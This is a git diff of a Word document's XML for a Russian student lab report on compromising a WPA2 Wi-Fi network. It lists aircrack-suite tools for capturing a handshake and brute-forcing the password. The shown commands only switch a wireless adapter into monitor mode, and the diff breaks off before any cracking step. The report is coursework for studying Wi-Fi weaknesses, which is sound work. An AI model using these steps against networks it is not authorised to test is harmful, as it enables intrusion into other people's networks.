--- a/6th semester/Вычислительные сети и контроль безопасности в компьютерных сетях/6/ВСКБКС_ЛР6_БардышевАА_СуханкулиевМ_ШангинаЕК.docx
+++ b/6th semester/Вычислительные сети и контроль безопасности в компьютерных сетях/6/ВСКБКС_ЛР6_БардышевАА_СуханкулиевМ_ШангинаЕК.docx
@@ -225,13 +225,7 @@
         <w:t>«</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Компрометация беспроводной </w:t>
-      </w:r>
-      <w:r>
-        <w:t>с</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ети</w:t>
+        <w:t>Компрометация беспроводной сети</w:t>
       </w:r>
       <w:r>
         <w:t>»</w:t>
@@ -453,21 +447,8 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Суханкулиев</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Мухаммет</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,</w:t>
+      <w:r>
+        <w:t>Суханкулиев Мухаммет,</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2265,68 +2246,18 @@
         <w:t xml:space="preserve">Цель работы – </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Изучить технологии защиты беспроводных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-Fi сетей, их преимущества, недостатки и уязвимости на примере компрометации технологии WPA2.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>Изучить технологии защиты беспроводных Wi-Fi сетей, их преимущества, недостатки и уязвимости на примере компрометации технологии WPA2.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>Для достижения поставленной цели необходимо решить следующие задачи:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Ознакомиться с назначением и возможностями следующих инструментов: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>airmon-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>airodump-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aireplay-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crunch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aircrack-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Ознакомиться с назначением и возможностями следующих инструментов: airmon-ng, airodump-ng, aireplay-ng, crunch, aircrack-ng</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2335,15 +2266,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>- Перехватить WPA-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> подключения клиента к целевой сети</w:t>
+        <w:t>- Перехватить WPA-handshake подключения клиента к целевой сети</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2353,15 +2276,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- При помощи перехваченного </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и сформированного списка паролей подобрать пароль целевой беспроводной сети</w:t>
+        <w:t>- При помощи перехваченного handshake и сформированного списка паролей подобрать пароль целевой беспроводной сети</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2411,14 +2326,12 @@
       <w:r>
         <w:t xml:space="preserve">- Встроенный </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>WiFi</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">-адаптер </w:t>
       </w:r>
@@ -2508,14 +2421,12 @@
       <w:r>
         <w:t xml:space="preserve">- </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>WiFi</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">-роутер </w:t>
       </w:r>
@@ -2580,561 +2491,492 @@
       <w:pPr>
         <w:pStyle w:val="afc"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>iwconfig</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Результат: Обнаружен беспроводной интерфейс `wlan0` с поддержкой IEEE 802.11, работающий на частоте 5.22 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GHz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> в режиме управляемой сети (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Managed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Результат: Обнаружен беспроводной интерфейс `wlan0` с поддержкой IEEE 802.11, работающий на частоте 5.22 GHz в режиме управляемой сети (Managed mode).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc224948648"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Перевод адаптера в режим мониторинга</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Для перевода </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WiFi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-адаптера в режим мониторинга использовалась утилита:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="afc"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>airmon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ng</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Результат: Определён интерфейс `</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>phy</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0` (`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wlan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0`) с драйвером `</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>mt</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7921</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">` и чипсетом </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MEDIATEK</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Corp</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MT</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7921</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>RZ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>608).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Перед переводом в режим мониторинга были остановлены конфликтующие процессы:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="afc"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>airmon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ng</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>check</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kill</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Результат: Остановлены процессы:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 961: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhclient</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 974: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wpa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>supplicant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 983: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wpa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>supplicant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Затем интерфейс был переведён в режим мониторинга:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="afc"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>airmon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ng</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>start</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wlan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Результат: Создан интерфейс `</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wlan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>mon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>` в режиме мониторинга (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Monitor</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>mode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc224948648"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Перевод</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>адаптера</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> в </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>режим</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vif</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>мониторинга</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Для перевода </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WiFi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-адаптера в режим мониторинга использовалась утилита:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>phy</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>0]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wlan</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>0).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Проверка статуса интерфейса:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="afc"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>airmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ng</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Результат: Определён интерфейс `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>phy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>0` (`</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wlan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>0`) с драйвером `</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mt</w:t>
-      </w:r>
-      <w:r>
-        <w:t>7921</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">` и чипсетом </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>MEDIATEK</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Corp</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>MT</w:t>
-      </w:r>
-      <w:r>
-        <w:t>7921</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>RZ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>608).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Перед переводом в режим мониторинга были остановлены конфликтующие процессы:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="afc"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>airmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>check</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kill</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Результат: Остановлены процессы:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PID</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 961: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dhclient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PID</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 974: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wpa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>supplicant</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PID</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 983: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wpa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>supplicant</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Затем интерфейс был переведён в режим мониторинга:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="afc"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>airmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>start</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wlan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Результат: Создан интерфейс `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wlan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>0</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` в режиме мониторинга (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Monitor</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mode</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vif</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>enabled</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
